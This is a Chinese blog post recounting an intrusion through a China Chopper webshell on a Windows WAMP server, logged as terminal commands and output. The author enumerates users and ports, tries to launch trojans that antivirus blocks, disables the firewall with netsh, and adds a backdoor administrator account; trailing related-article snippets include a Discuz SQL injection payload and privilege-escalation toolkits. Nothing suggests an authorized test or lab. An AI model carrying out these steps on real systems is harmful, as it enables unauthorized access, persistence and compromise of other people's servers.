菜刀php提权,遇见一个权限很大的机器,菜刀提权过程 -电脑资料

最新推荐文章于 2021-04-07 16:19:58 发布
最新推荐文章于 2021-04-07 16:19:58 发布
阅读量1.4k 收藏
点赞数
文章标签: 菜刀php提权

各位 大婶 红客大叔理解下哈   xxoo插插喔喔  代表网站  192.168.1.1 代表 服务器ip

[*] 磁盘列表 [ A:C:E: ]

D:\wamp\www\xxoo\plus\> help

设置终端路径:    SETP c:\windows\system32\cmd.exe 或者 SETP /bin/sh

切换到根目录:    ROOT

D:\wamp\www\xxoo\plus\> SETP c:\windows\system32\cmd.exe

设置终端路径为::c:\windows\system32\cmd.exe

D:\wamp\www\xxoo\plus\> net user

\\ 的用户帐户

-------------------------------------------------------------------------------

Administrator        Guest              hzwwsj

SUPPORT_388945a0

命令运行完毕,但发生一个或多个错误,

D:\wamp\www\xxoo\plus\> netstat -an

Active Connections

Proto  Local Address      Foreign Address      State

TCP  0.0.0.0:80        0.0.0.0:0          LISTENING

TCP  0.0.0.0:135        0.0.0.0:0          LISTENING

TCP  0.0.0.0:445        0.0.0.0:0          LISTENING

TCP  0.0.0.0:1025        0.0.0.0:0          LISTENING

TCP  0.0.0.0:3306        0.0.0.0:0          LISTENING

TCP  0.0.0.0:3389        0.0.0.0:0          LISTENING

TCP  127.0.0.1:1026      0.0.0.0:0          LISTENING

TCP  127.0.0.1:3306      127.0.0.1:3532      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3533      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3534      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3535      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3536      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3537      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3538      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3539      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3540      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3542      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3543      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3544      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3545      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3546      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3547      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3548      TIME_WAITTCP  127.0.0.1:3306      127.0.0.1:3549      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3550      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3551      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3552      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3553      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3554      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3555      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3556      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3557      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3558      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3559      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3560      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3561      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3563      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3564      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3565      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3566      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3567      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3568      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3569      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3570      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3571      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3572      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3573      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3574      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3575      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3576      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3577      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3578      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3579      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3580      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3583      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3585      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3586      TIME_WAITTCP  127.0.0.1:3306      127.0.0.1:3587      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3588      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3590      ESTABLISHED

TCP  127.0.0.1:3306      127.0.0.1:3591      TIME_WAIT

TCP  127.0.0.1:3306      127.0.0.1:3592      TIME_WAIT

TCP  127.0.0.1:3581      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3582      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3584      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3589      127.0.0.1:3306      TIME_WAIT

TCP  127.0.0.1:3590      127.0.0.1:3306      ESTABLISHED

TCP  127.0.0.1:43958      0.0.0.0:0          LISTENING

TCP  127.0.0.1:43958      127.0.0.1:3541      TIME_WAIT

TCP  127.0.0.1:43958      127.0.0.1:3562      TIME_WAIT

TCP  192.168.1.1:21    0.0.0.0:0          LISTENING

TCP  192.168.1.1:80    14.17.18.146:40131    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40400    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40401    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40402    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40403    TIME_WAIT

TCP  192.168.1.1:80    14.17.18.146:40405    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:35188    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:37577    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:39584    ESTABLISHED

TCP  192.168.1.1:80    108.178.60.2:41667    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:47054    TIME_WAIT

TCP  192.168.1.1:80    108.178.60.2:57571    TIME_WAIT

TCP  192.168.1.1:80    117.26.202.179:54990  ESTABLISHED

TCP  192.168.1.1:80    123.125.71.15:60628  TIME_WAIT

TCP  192.168.1.1:80    123.125.71.80:40429  ESTABLISHED

TCP  192.168.1.1:80    123.129.73.243:2543  TIME_WAIT

TCP  192.168.1.1:80    123.129.73.243:4352  TIME_WAIT

TCP  192.168.1.1:80    123.134.4.135:57203  LAST_ACK

TCP  192.168.1.1:80    123.134.4.135:57204  LAST_ACK

TCP  192.168.1.1:80    124.114.213.4:49936  ESTABLISHED

TCP  192.168.1.1:80    124.166.19.109:4975  ESTABLISHED

TCP  192.168.1.1:80    124.207.123.47:4375  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:7409  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:7411  TIME_WAITTCP  192.168.1.1:80    124.207.123.47:8156  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:18662  TIME_WAIT

TCP  192.168.1.1:80    124.207.123.47:18663  TIME_WAIT

TCP  192.168.1.1:80    180.153.236.60:62502  TIME_WAIT

TCP  192.168.1.1:80    180.153.236.65:23047  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51648  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51649  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51650  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51651  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51652  TIME_WAIT

TCP  192.168.1.1:80    219.133.116.44:51653  TIME_WAIT

TCP  192.168.1.1:139  0.0.0.0:0          LISTENING

UDP  0.0.0.0:445        *:*

UDP  0.0.0.0:1228        *:*

UDP  127.0.0.1:123      *:*

UDP  127.0.0.1:1286      *:*

UDP  127.0.0.1:2269      *:*

UDP  127.0.0.1:2284      *:*

UDP  192.168.1.1:123  *:*

UDP  192.168.1.1:137  *:*

UDP  192.168.1.1:138  *:*

D:\wamp\www\xxoo\plus\>

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 1.exe

D:\wamp\www\xxoo\plus\> cd\

D:\> 0.exe

D:\wamp\www\xxoo\plus\>

D:\wamp\www\xxoo\plus\> c:

C:\> 1.exe

D:\wamp\www\xxoo\plus\> c:

C:\> 1.exe

D:\wamp\www\xxoo\plus\> c:

C:\> server.exe

D:\wamp\www\xxoo\plus\> c:

C:\> server.exe

D:\wamp\www\xxoo\plus\> c:

C:\> server.exe

D:\wamp\www\xxoo\plus\>

D:\wamp\www\xxoo\plus\> netsh firewall set opmode mode=disable

确定,遇见一个权限很大的机器,菜刀提权过程》(https://www.unjs.com)。

D:\wamp\www\xxoo\plus\> net user a a /add

命令成功完成。

D:\wamp\www\xxoo\plus\> net localgroup administrators a /add

命令成功完成。

下来 解释哈  ip连接不到3389  但3389 开了  想着 上传木马  命令

C:\> server.exe

D:\> 1.exe

没上线  后来发现360  我的不免杀  呵呵

想了一下为什么连接不到3389 呢  后来 想了一下就只有 防火墙了  命令

netsh firewall set opmode mode=disable

关闭防火墙  3389 成功打开

D:\wamp\www\xxoo\plus\> net user a a /add

命令成功完成。

D:\wamp\www\xxoo\plus\> net localgroup administrators a /add

命令成功完成。

用户建立ok

百年难遇的  菜刀提权  这个权限真是难得一见啊  哈哈  大牛们见笑了

weixin_39835321
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权
mirror97black的博客
12-20 1809
提权
clcl.tv index.php,www.xxoommm.info
weixin_35057804的博客
03-12 1万+
Domain Name: XXOOMMM.INFORegistry Domain ID: D503300000032813918-LRMSRegistrar WHOIS Server: whois.namecheap.comRegistrar URL: www.namecheap.comUpdated Date: 2017-02-06T16:17:55ZCreation Date: 2017-02...
菜刀php提权,靶机SickOs1.2练习:上传马文件菜刀连接/反弹shell,进行本地提权
weixin_39796533的博客
03-19 478
1.主机发现 2.信息扫描 指纹信息 3.端口访问 该页面未发现有效信息尝试ssh弱口令连接,密码为root,直接提权成功! 4.目录扫描 未发现有效路径 有一个test目录,访问看看 点击文件,未发现有用信息方法一:可以尝试抓包,修改option为put,上传马文件,菜刀连接getshell 上传成功! 菜刀连接 方法二:获取反弹shell脚本文件,进行监听,连接 上传该文件到靶机 开启监...
超级好用的提权工具-----中国菜刀
Sumarua的博客
06-22 1764
超级好用的提权工具-----中国菜刀 资源已上传至☞:https://download.csdn.net/download/weixin_43510203/12543265
打发无聊的100个网站
热门推荐
博客转移到个人主站,请大家移步 http://www.soskp.com/
12-12 22万+
1,打发无聊时光的100个很经典的令人感叹为止网站,看看自己具有哪个大明星的脸型 http://www.play-analogia.com/cgi-bin/index/ <br />2,超有意思的Flash网站,虚拟办公 http://agencynet.com <br />3,亲自动手给美女画纹身 http://www.crustydemons.co.uk/UK/tattoo_parlour/index.html <br />4,输入文字就发出声音! http://www.putonghuaonline.
行业资料-交通装置-一种不粘刀菜刀.zip
08-20
行业资料-交通装置-一种不粘刀菜刀.zip
行业文档-设计装置-一种节能菜刀.zip
08-29
这份文档很可能是关于厨房用具设计领域的一个创新项目,特别是聚焦在节能型菜刀的设计上。接下来,我们将深入探讨这个领域的相关知识点。 一、节能菜刀的设计理念 节能菜刀的核心概念是降低使用过程中的能量消耗,...
IIS6.0提权工具包(包含iis6.exe,iislpe.exe,cmd.exe)
08-30
IIS6.0的提权工具包,建议配合菜刀工具食用,其他的Webshell管理工具不好用 工具包包含:iis6.exe,iislpe.exe,cmd.exe 之前不小心设置了动态调分 导致付费了 现在改成静态分
上面提权的软件.rar
11-17
CVE-2018-8120-master,CVE-2018-8174_EXP-master,mimikatz_trunk,netcat-win32-1.12,ophcrack-3.7.0-bin,processinjector,udf,wce_v1_41beta_universal,wce_v1_42beta_x32,wce_v1_42beta_x64,菜刀
行业文档-设计装置-一种具有打孔器的菜刀.zip
08-30
在本主题中,我们主要探讨的是“一种具有打孔器的菜刀”这一创新设计,它结合了传统厨刀的功能与现代技术,旨在提升厨房工作效率和烹饪体验。这个设计不仅适用于家庭厨房,还可能对餐饮业产生深远影响。以下是关于这...
Python 获取动漫番剧 -XXOO
JueDream的博客
01-27 3万+
前言 没有什么好说的,就是想起来前些年失恋使劲刷番剧缓解自己糟糕的情绪。纪念下。 一、直接上代码 1.搜索入口 # 搜索动漫名称 列表 def get_video_list(name): # 开启代理 # proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080' } url = 'http://www.7666.tv/search.php?searchword=' + nam...
sqlmap用法
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
discuz 7.2 faq.php sql注入漏洞,Discuz 7.2 /faq.php SQL注入漏洞
weixin_31935793的博客
04-07 4288
Discuz 7.2 /faq.php SQL注入漏洞1.获取数据库版本信息http://www.xxoo.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from ...
Js跨域、父级窗口执行JS赋值、取值,更改元素
weixin_34309435的博客
12-02 4213
网站域名:   A:http://www.xxoo.com/a.html   B:http://www.aabb.com/b.html B网站嵌套与A网站(A的a中的Iframe指向B中的b)b要让父级a页面执行脚本  则有如下几种方式: 在A域名下网站新建a1.html页面 在B域名下b网页添加iframe 指向a1.html页面  路径为http://www.xxoo.com/a1....
这辈子只能碰到一次! 记一次SSL无故被撤消!
weixin_30394251的博客
04-06 3017
SSL证书刚更新一切都那么正常, 突然有一天网站不能访问了, Chrome浏览器提示有风险, 没有继续访问链接,没有,没有, 重要的事情说三遍, 于是乎赶紧加班查原因, 发展浏览器报的错误是证书撤消(不敢相信,难不成....), 赶紧试所有的有浏览器试了个遍都一样又去手工验证, 天哪是真的, 只能打CA提供商客服了. 原来是CA那边出bug了, 具体什么bug就是好多ssl证书没验证域名所有权就发...
Shell的详细解释
xxoo00xx00的博客
12-27 2243
Shell的详解: env是观察常见的环境变量,而set是观察所有的环境变量 `是xx符号,主要是里面的东东先执行在Linux的Shell当中,$$代表的是目前Shell的id 而$?代表的是shell的回传值,也就是上一个命令的是否执行成功 local代表的是语系 export是把当前的变量传给下一个环境,(declare) 发量键盘读叏、数组不宣告: read, array, decla
浅释"面向xxoo"
朗朗乾坤在~ 悠悠去来兮~
02-17 6273
问:JAVA和C有什么区别? 答:JAVA面向对象,C面向过程。         以上是我很久以前看到的一段对话,当时就觉得有点高深莫测的样子。近日又看到了同样的对话,一时有些不安。于是,就有了这篇小文。先声明本文不是妄论语言长短,只是对“面向xxoo”这种古怪的的说法浅作解释。         话说自上古洪荒时期盘古抄起家伙劈开那混沌天地以来……很遗憾这与本文无关。         先扯
剑英陪你玩转图形学 (三)归去来
dianjupi9036的博客
09-18 2295
今天的主题是数学,尤其是要把向量说一说 开篇废话 王全安又进去了,最近不太好引用岛国文化来开篇,来点民族的。 恰逢中秋,让我想起了一首脍炙人口的水调歌头。 明月几时有,把酒问群友。不知这次版本,今晚能出否。我欲推倒重构,又恐项目经理,深夜对我吼。增删改代码,好像没保存…..深呼吸,看屏幕,泪在流。不应有恨,谁没忘记存代码?人有悲欢离合,码有丢失冲突,此事古难全。但...
今天看到小妞了
weixin_34211761的博客
07-29 544
转载于:https://www.cnblogs.com/sesexxoo/archive/2006/07/29/6190716.html
dvwa命令注入提权
最新发布
12-05
4.在菜刀中连接目标机器,即可获得一个shell,使用whoami命令查看当前用户,如果是www-data,则可以使用如下命令提权: ``` sudo -l ``` 这个命令会列出当前用户可以使用sudo命令执行的命令。 5.如果当前用户可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值